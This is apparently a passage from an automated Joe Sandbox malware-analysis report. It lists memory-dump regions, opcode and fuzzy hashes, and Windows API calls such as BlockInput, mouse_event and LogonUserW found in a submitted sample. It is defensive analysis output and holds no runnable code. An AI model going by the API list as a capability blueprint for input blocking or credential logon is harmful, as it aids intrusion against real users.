                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        • Opcode ID: 71d29b30b63ad35bec442b4d3e1e3064dbe6c640d4b4462aed424959cd843ea0
                                                                        • Instruction ID: b571a062451d752ff7a40dc5e9184cadc2dc83ddc7d65d184046538b8e83590d
                                                                        • Opcode Fuzzy Hash: 71d29b30b63ad35bec442b4d3e1e3064dbe6c640d4b4462aed424959cd843ea0
                                                                        • Instruction Fuzzy Hash: 7E727D72E00219DFDF24CF68C4806ADB7B6FF89314F25815AD959AB391D734AE81CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 73aca5e598d9fa79f615f6ef116508f39b3e2d4d0116cb1566585c0399fb8d8f
                                                                        • Instruction ID: 8ea3788b1d43bb144a9ecb846d14ccf2e76992ad852b5c12843bdef2a9e2a557
                                                                        • Opcode Fuzzy Hash: 73aca5e598d9fa79f615f6ef116508f39b3e2d4d0116cb1566585c0399fb8d8f
                                                                        • Instruction Fuzzy Hash: 88321732E2AF054DDB239635D922335A29CAFB73D4F15D737E819B5AA9DB28C4C35200
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 674341424-0
                                                                        • Opcode ID: 27e3e1f423ced90105214d554a62c35db18f296696ef5bac13d74e782656dc73
                                                                        • Instruction ID: 0d3b76dc088c4044d46a3c0715aa39044124c7c2d78da8c29807aba3fa69538c
                                                                        • Opcode Fuzzy Hash: 27e3e1f423ced90105214d554a62c35db18f296696ef5bac13d74e782656dc73
                                                                        • Instruction Fuzzy Hash: 472266B16083199FD724DF28C891B6AB7E4FF84314F10491DFADA9B291DB71E944CB82
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b7aac679629b1f1fc47c2dd8c312a2543f52a9abd1d4a017b0e4ac72e263d185
                                                                        • Instruction ID: 45b6e27a9c2d42d2437ea992de139af622f8de976af2f7e3219aab3e3b3652c2
                                                                        • Opcode Fuzzy Hash: b7aac679629b1f1fc47c2dd8c312a2543f52a9abd1d4a017b0e4ac72e263d185
                                                                        • Instruction Fuzzy Hash: 83B1F130D3AF514DD2239A398831336B65C6FBB2D5F92D71BFC1A74E26EB2185875280
                                                                        APIs
                                                                        • __time64.LIBCMT ref: 0093B6DF
                                                                          • Part of subcall function 0091344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0093BDC3,00000000,?,?,?,?,0093BF70,00000000,?), ref: 00913453
                                                                          • Part of subcall function 0091344A: __aulldiv.LIBCMT ref: 00913473
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                                        • String ID:
                                                                        • API String ID: 2893107130-0
                                                                        • Opcode ID: 7fe28f7326b31e26611bda6519ff1b4f19ba900f597f2f8b44533143355e180e
                                                                        • Instruction ID: 8d2cad88aa238bd3f7fa2e42fc70ab4a095f9e66cfbadb9d70b4556e943a4ab2
                                                                        • Opcode Fuzzy Hash: 7fe28f7326b31e26611bda6519ff1b4f19ba900f597f2f8b44533143355e180e
                                                                        • Instruction Fuzzy Hash: 9F217F726345108BC729CF28C891A92B7E5EB95320B648E6DE4E5CB2C1CB74BA05DB94
                                                                        APIs
                                                                        • BlockInput.USER32(00000001), ref: 00946ACA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BlockInput
                                                                        • String ID:
                                                                        • API String ID: 3456056419-0
                                                                        • Opcode ID: f39e6e234355df2d316e6ae77b7ec9554c269e070f8e7b6fbc188c0743884518
                                                                        • Instruction ID: 13db45b6f644582bca5683dc6e66f0866290a64e7175e25feab0675b0d92922a
                                                                        • Opcode Fuzzy Hash: f39e6e234355df2d316e6ae77b7ec9554c269e070f8e7b6fbc188c0743884518
                                                                        • Instruction Fuzzy Hash: 2DE092362002046FD700EF69D404D56B7EDAFA4351B04C416EA49D7290CAB0F8048B91
                                                                        APIs
                                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 009374DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: mouse_event
                                                                        • String ID:
                                                                        • API String ID: 2434400541-0
                                                                        • Opcode ID: bfef5ce90d6012dce811db04bd25907741f161e9ce4e99a814c08670da13618c
                                                                        • Instruction ID: c41a48e978238f03b8e274433e81912fdab710a41fbfa43702c9e2f59f0f84a2
                                                                        • Opcode Fuzzy Hash: bfef5ce90d6012dce811db04bd25907741f161e9ce4e99a814c08670da13618c
                                                                        • Instruction Fuzzy Hash: 11D05EE512C30539EC3817A49C0FF76C94EF3007C0F808589B082C90E3B8847841A932
                                                                        APIs
                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0092AD3E), ref: 0092B124
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: LogonUser
                                                                        • String ID:
                                                                        • API String ID: 1244722697-0
                                                                        • Opcode ID: 0a53192f052f81bfdcbb72f3ac0bc15eda9cbfbbc125531070285538af458316
                                                                        • Instruction ID: 4a401246e00198af34f2600159d80652fa43835c68ef5bc38e52201004c28579
                                                                        • Opcode Fuzzy Hash: 0a53192f052f81bfdcbb72f3ac0bc15eda9cbfbbc125531070285538af458316
                                                                        • Instruction Fuzzy Hash: F6D09E331A464EAEDF025FA4DC06EAE3F6AEB04701F449511FA15D50A1C675D531AB50
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: NameUser
                                                                        • String ID:
                                                                        • API String ID: 2645101109-0
                                                                        • Opcode ID: 3fe4fec5fb1151ebec22310f592a132c6ece7a003ae1c2604e4e097d0ae45101
                                                                        • Instruction ID: 7f37b6a428c65c9b1871b60efa0325393b15493cf900549cb970b406ad1c2532
                                                                        • Opcode Fuzzy Hash: 3fe4fec5fb1151ebec22310f592a132c6ece7a003ae1c2604e4e097d0ae45101
                                                                        • Instruction Fuzzy Hash: ADC04CB2405509DFC751CBC0C9449EEB7BCAB04301F1050919146F1110D7789B859F72
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0091818F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 075336d4c568d53cb01653a9230907df42a137df198e396017b17f72b5d2df9d
                                                                        • Instruction ID: 032cc5ecc3eb47e039631ea951af44fa68d262091ee247df67ea749d563287e9
                                                                        • Opcode Fuzzy Hash: 075336d4c568d53cb01653a9230907df42a137df198e396017b17f72b5d2df9d
                                                                        • Instruction Fuzzy Hash: DDA0243100410CF7CF001F41FC044443F7CFF001547000010F40C04030C733555055D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ffdc493ca657cd5e78496e23f7b1d4b5b29af448d8363b062219bd3534e370e0
                                                                        • Instruction ID: b9f390340d8d10be292b0b355c3103a075cb78e860824d007aac49efd401c79d
                                                                        • Opcode Fuzzy Hash: ffdc493ca657cd5e78496e23f7b1d4b5b29af448d8363b062219bd3534e370e0
                                                                        • Instruction Fuzzy Hash: 41229D7090420DCFDB24DF68C490BBAB7B1FF58304F148169EA96DB3A1E735A985CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d6c6cab6a117931767c953ca3d15dc26c78e7511e1a4ed36df3af69d5814ad90
                                                                        • Instruction ID: 9968fe9e5c4483af13775a74f4429a954eeb3699d8dbd53b54d2983efe1e529a
                                                                        • Opcode Fuzzy Hash: d6c6cab6a117931767c953ca3d15dc26c78e7511e1a4ed36df3af69d5814ad90
                                                                        • Instruction Fuzzy Hash: 56126B70A0060D9FDF14DFA8DA85ABEB7F5FF48300F204569E946E7290EB35A920CB55
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 3728558374-0
                                                                        • Opcode ID: 3b13c7ba6bb88859e3d3600d65a10e5aa71230d7c27c1c04ab215cddeb37751d
                                                                        • Instruction ID: e147ba28384859b0f0ffb3e6a9a4d666278a908703f3bbd0961530a7df06d3cd
                                                                        • Opcode Fuzzy Hash: 3b13c7ba6bb88859e3d3600d65a10e5aa71230d7c27c1c04ab215cddeb37751d
                                                                        • Instruction Fuzzy Hash: 1E02C170A00209DFCF14DF68D991ABEBBB5FF84300F208469E906DB295EB35DA55CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                        • Instruction ID: f2627d52f5b4816410aaf6e0772c389351f5eb20ded16b387fe180add09b48bb
                                                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                        • Instruction Fuzzy Hash: F4C1F3323050970EDF2D463AC47447EBAA55AE2BF531A076DE8B3CB4D1EF60C6A4D620
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                        • Instruction ID: fa3b9c0bd2e623a2a80ea442db817ec903677c3a37464d6ff523074d188e3a14
                                                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                        • Instruction Fuzzy Hash: 4EC1E3323091970EEF2D463AC43447EBAA55EE2BB531A076DD4B3CB4D5EF21C6A4D620
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                        • Instruction ID: 2d0eaf92cec4a8f61a54031650fa62306bf00a59628c8a89bce8a6833bd4c0ba
                                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                        • Instruction Fuzzy Hash: 05C1D2322091970EDF2D463AC43447EFAA55AA2BB531A077DD4B3CB8D5EF24C6A4D620
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                        • Instruction ID: f76c6ab241d2681cfd9ff7408e8650d78b7ca506eb8442a2e8d725f98c3ec29b
                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                        • Instruction Fuzzy Hash: 1EC1A2322094A30DDF3D4639C47443EBAA95EA2BB531A077DD4B3CB9D5EF20D664D620
                                                                        APIs
                                                                        • SetTextColor.GDI32(?,00000000), ref: 0095D2DB
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0095D30C
                                                                        • GetSysColor.USER32(0000000F), ref: 0095D318
                                                                        • SetBkColor.GDI32(?,000000FF), ref: 0095D332
                                                                        • SelectObject.GDI32(?,00000000), ref: 0095D341
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0095D36C
                                                                        • GetSysColor.USER32(00000010), ref: 0095D374
                                                                        • CreateSolidBrush.GDI32(00000000), ref: 0095D37B
                                                                        • FrameRect.USER32(?,?,00000000), ref: 0095D38A
                                                                        • DeleteObject.GDI32(00000000), ref: 0095D391
                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0095D3DC
                                                                        • FillRect.USER32(?,?,00000000), ref: 0095D40E
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0095D439
                                                                          • Part of subcall function 0095D575: GetSysColor.USER32(00000012), ref: 0095D5AE
                                                                          • Part of subcall function 0095D575: SetTextColor.GDI32(?,?), ref: 0095D5B2
                                                                          • Part of subcall function 0095D575: GetSysColorBrush.USER32(0000000F), ref: 0095D5C8
                                                                          • Part of subcall function 0095D575: GetSysColor.USER32(0000000F), ref: 0095D5D3
                                                                          • Part of subcall function 0095D575: GetSysColor.USER32(00000011), ref: 0095D5F0
                                                                          • Part of subcall function 0095D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0095D5FE
                                                                          • Part of subcall function 0095D575: SelectObject.GDI32(?,00000000), ref: 0095D60F
                                                                          • Part of subcall function 0095D575: SetBkColor.GDI32(?,00000000), ref: 0095D618
                                                                          • Part of subcall function 0095D575: SelectObject.GDI32(?,?), ref: 0095D625
                                                                          • Part of subcall function 0095D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0095D644
                                                                          • Part of subcall function 0095D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0095D65B
                                                                          • Part of subcall function 0095D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0095D670
                                                                          • Part of subcall function 0095D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0095D698
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                        • String ID:
                                                                        • API String ID: 3521893082-0
                                                                        • Opcode ID: c50fa782a2ca31b4fbd918d58922175405d459c11c13f22fa72d38400cc65a51
                                                                        • Instruction ID: b451b3138cb810891ca7c4b150adab6225009f55ce4bade9cb3433f8ff739d0f
                                                                        • Opcode Fuzzy Hash: c50fa782a2ca31b4fbd918d58922175405d459c11c13f22fa72d38400cc65a51
                                                                        • Instruction Fuzzy Hash: 5A918D7200E301AFDB10DF64DC08A6B7BB9FF89325F100A19F96A961E0D731D984DB92
                                                                        APIs
                                                                        • DestroyWindow.USER32 ref: 0090B98B
                                                                        • DeleteObject.GDI32(00000000), ref: 0090B9CD
                                                                        • DeleteObject.GDI32(00000000), ref: 0090B9D8
                                                                        • DestroyIcon.USER32(00000000), ref: 0090B9E3
                                                                        • DestroyWindow.USER32(00000000), ref: 0090B9EE
                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0096D2AA
                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0096D2E3
                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0096D711
                                                                          • Part of subcall function 0090B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0090B759,?,00000000,?,?,?,?,0090B72B,00000000,?), ref: 0090BA58
                                                                        • SendMessageW.USER32 ref: 0096D758
                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0096D76F
                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 0096D785
                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 0096D790
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
